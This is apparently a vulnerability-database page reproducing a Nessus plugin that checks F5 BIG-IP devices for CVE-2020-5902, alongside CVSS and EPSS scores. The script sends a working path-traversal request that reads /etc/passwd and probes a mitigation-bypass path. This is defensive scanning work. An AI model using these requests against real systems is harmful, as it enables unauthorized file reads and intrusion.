Lucene search

K
nessusThis script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.F5_CVE-2020-5902.NASL
HistoryJul 06, 2020 - 12:00 a.m.

F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)

2020-07-0600:00:00
This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
612

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.975

Percentile

100.0%

A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(138140);
  script_version("1.14");
  script_set_attribute(attribute:"plugin_modification_date", value:"2023/01/18");

  script_cve_id("CVE-2020-5902");
  script_xref(name:"IAVA", value:"2020-A-0283-S");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");
  script_xref(name:"CISA-NCAS", value:"AA22-011A");
  script_xref(name:"CEA-ID", value:"CEA-2020-0129");
  script_xref(name:"CEA-ID", value:"CEA-2020-0122");
  script_xref(name:"CEA-ID", value:"CEA-2020-0055");

  script_name(english:"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)");

  script_set_attribute(attribute:"synopsis", value:
"BIG-IP Traffic Management User Interface Remote Code Execution.");
  script_set_attribute(attribute:"description", value:
"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the
Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute
arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.");
  script_set_attribute(attribute:"see_also", value:"https://support.f5.com/csp/article/K52145254");
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version recommended in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-5902");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"F5 BIG-IP Traffic Management User Interface File Disclosure");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_analytics");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_domain_name_system");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_fraud_protection_service");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("bigip_web_detect.nasl");
  script_require_keys("installed_sw/F5 BIG-IP web management");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include('http.inc');
include('install_func.inc');

app = 'F5 BIG-IP web management';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);
install = get_single_install(app_name:app, port:port);
passwd_pattern = "root:.*:0:[01]:";
poc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';
bypass_path = '/hsqldb;';

file = "/etc/passwd";
generic = FALSE;
line_limit = 10;

url = build_url(qs:"/", port:port);

res = http_send_recv3(
  method        : 'GET',
  port          : port,
  item          : poc_path,
  exit_on_fail  : TRUE
);

if (!egrep(pattern:passwd_pattern, string:res[2]))
{

  res = http_send_recv3(
    method        : 'GET',
    port          : port,
    item          : bypass_path,
    exit_on_fail  : TRUE
  );

  if('HSQL Database Engine Servlet'>< res[2])
  {
    output = chomp(res[2]);
    file = NULL;
    generic = TRUE;
    line_limit = 3;
  }
  else
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
}
else{
  output = str_replace(string:res[2], find:'\\n', replace:'\n');
}

security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  request     : make_list(http_last_sent_request()),
  file        : file,
  generic     : generic,
  output      : output,
  line_limit  : line_limit,
  attach_type : 'text/plain'
);

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.975

Percentile

100.0%